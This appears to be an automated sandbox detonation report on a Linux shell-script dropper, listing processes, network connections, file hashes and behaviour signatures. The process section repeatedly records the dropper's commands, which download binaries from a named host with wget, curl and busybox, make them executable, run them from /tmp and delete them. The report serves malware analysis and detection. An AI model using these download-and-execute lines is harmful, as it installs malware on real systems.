/tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y

[./sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/rm

[rm sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/chmod

[chmod 777 fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1

[./fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/rm

[rm fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/chmod

[chmod 777 FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

[./FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/rm

[rm FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/chmod

[chmod 777 bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt

[./bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/rm

[rm bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/chmod

[chmod 777 hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ

[./hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/rm

[rm hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/chmod

[chmod 777 rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D

[./rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/rm

[rm rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/chmod

[chmod 777 RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9

[./RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/rm

[rm RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/chmod

[chmod 777 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I

[./3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/rm

[rm 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/chmod

[chmod 777 ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA

[./ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/rm

[rm ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/chmod

[chmod 777 kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2

[./kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/rm

[rm kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/chmod

[chmod 777 aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH

[./aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/rm

[rm aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/chmod

[chmod 777 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc

[./4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/rm

[rm 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 01:01

Reported

2024-11-14 01:03

Platform

debian9-mipsel-20240226-en

Max time kernel

150s

Max time network

155s

Command Line

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj N/A
N/A /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt N/A
N/A /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ N/A
N/A /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA N/A
N/A /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 N/A
N/A /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D N/A
N/A /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 N/A
N/A /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I N/A
N/A /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH N/A
N/A /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc N/A
N/A /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 N/A
N/A /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs N/A
N/A /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY N/A
N/A /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y N/A
N/A /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs N/A
N/A /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY N/A
N/A /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y N/A
N/A /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 N/A
N/A /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj N/A
N/A /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt N/A
N/A /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ N/A
N/A /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D N/A
N/A /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 N/A
N/A /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I N/A
N/A /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA N/A
N/A /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 N/A
N/A /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /usr/bin/curl N/A
File opened for modification /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /usr/bin/curl N/A
File opened for modification /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /usr/bin/curl N/A
File opened for modification /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /usr/bin/curl N/A
File opened for modification /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /usr/bin/curl N/A
File opened for modification /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /usr/bin/curl N/A
File opened for modification /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /usr/bin/curl N/A
File opened for modification /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /usr/bin/curl N/A
File opened for modification /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /usr/bin/curl N/A
File opened for modification /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /usr/bin/curl N/A
File opened for modification /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /usr/bin/curl N/A
File opened for modification /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /usr/bin/curl N/A
File opened for modification /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /usr/bin/curl N/A
File opened for modification /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /usr/bin/curl N/A
File opened for modification /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /usr/bin/curl N/A
File opened for modification /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /usr/bin/curl N/A
File opened for modification /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /usr/bin/curl N/A
File opened for modification /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /usr/bin/curl N/A
File opened for modification /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /usr/bin/curl N/A
File opened for modification /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /usr/bin/curl N/A
